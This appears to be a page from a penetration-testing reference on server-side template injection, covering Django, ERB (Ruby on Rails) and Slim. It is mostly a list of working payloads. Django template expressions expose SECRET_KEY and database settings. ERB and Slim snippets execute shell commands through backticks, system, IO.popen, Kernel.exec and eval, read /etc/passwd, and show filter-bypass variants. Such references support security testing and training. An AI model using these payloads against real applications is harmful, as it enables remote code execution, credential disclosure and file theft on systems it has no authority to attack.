Other Template Engines (Ruby, Node, Django)
| CWE | CWE-1336 |
| Tools | tplmap |
| Difficulty | 🔴 advanced |
Django Templates (Python)​
Django templates are heavily sandboxed. RCE is rarely possible, but information disclosure is common.
Information disclosure:
{{ settings.SECRET_KEY }}
{{ settings.DATABASES }}
{% debug %}
Try to escalate by looking for custom template tags that may be less restricted.
ERB (Ruby)​
ERB is the default template engine for Ruby on Rails.
Detection:
<%= 7*7 %>
RCE:
<%= `id` %>
<%= system('id') %>
<%= IO.popen('id').read %>
File read:
<%= File.read('/etc/passwd') %>
Bypass techniques:
<%= %x(id) %>
<%= Kernel.exec('id') %>
<%= eval("system('id')") %>
Slim (Ruby)​
Slim is a lightweight templating engine for Ruby.
Detection:
= 7*7
RCE:
= `id`
= system('id')
= IO.read('/etc/passwd')